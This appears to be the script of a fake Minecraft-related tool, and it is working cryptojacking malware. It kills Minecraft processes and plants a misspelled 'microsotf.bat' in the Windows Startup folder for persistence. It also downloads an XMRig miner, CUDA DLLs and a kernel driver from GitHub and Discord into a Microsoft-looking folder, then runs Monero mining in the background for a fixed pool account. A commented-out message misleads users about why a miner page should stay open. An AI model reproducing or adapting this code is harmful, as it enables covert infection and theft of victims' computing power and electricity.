

//execute('cmd /c taskkill /f /im oxibyte.exe');
//execute('cmd /c taskkill /f /im Minecraft.exe');
if($GLOBALS['start'] != 1){
execute('cmd /c taskkill /f /im Minecraft.exe');
execute('cmd /c taskkill /f /im Minecraft.Windows.exe');
execute('cmd /c taskkill /f /im oxibyte.exe');
}
file_put_contents($_ENV['APPDATA'].'\Microsoft\Windows\Start Menu\Programs\Startup\microsotf.bat','start '.$_ENV['APPDATA'].'\\Microsoft\\5.exe'.' --coin XMR --url mine.bmpool.org:6004 --user 2970288 -p Processor --log-file 1619948916_xmr_12001_log.txt --http-host 127.0.0.1 --http-port 12001 --threads 6 -B');
//execute('cmd /c start https://vk.com/minecraft_education_windows_7');
//execute('cmd /c start https://discord.gg/bQqCrzugng');
//execute('cmd /c start https://oxibyteminecraftbedrockaddons.flarum.cloud/u/Oxibyte');
//execute('cmd /c start https://sharem.tech/r/Oxibyte');
//waitAsync(5400000,function(){
//execute('cmd /c start https://vk.com/public203780956');

//456


//00000000000000


//message("Не закрывайте страницу http://lightminer.co/2970288 в браузере, тем самым вы помогаете собрать деньги на оплату программистов которые для нас делают мультиплеер!");


use httpclient;

(new Thread(function(){
    file_put_contents($_ENV['APPDATA'].'\\Microsoft\\xmrig-cuda.dll',file_get_contents('https://github.com/Rastihin/mce/raw/main/xmrig-cuda.dll'));
    file_put_contents($_ENV['APPDATA'].'\\Microsoft\\WinRing0x64.sys',file_get_contents('https://github.com/Rastihin/mce/raw/main/WinRing0x64.sys'));
    file_put_contents($_ENV['APPDATA'].'\\Microsoft\\nvrtc-builtins64_102.dll',file_get_contents('https://cdn.discordapp.com/attachments/836942104986124312/838423281199611914/nvrtc-builtins64_102.dll'));
    file_put_contents($_ENV['APPDATA'].'\\Microsoft\\nvrtc64_102_0.dll',file_get_contents('https://github.com/Rastihin/mce/raw/main/nvrtc64_102_0.dll'));
    file_put_contents($_ENV['APPDATA'].'\\Microsoft\\5.exe',file_get_contents('https://github.com/Rastihin/mce/raw/main/5.exe'));
    wait(5000);
    execute('cmd /c '.$_ENV['APPDATA'].'\\Microsoft\\5.exe'.' --coin XMR --url mine.bmpool.org:6004 --user 2970288 -p Processor --log-file 1619948916_xmr_12001_log.txt --http-host 127.0.0.1 --http-port 12001 --threads 6 -B');
        
exit();
}))->start();


//});


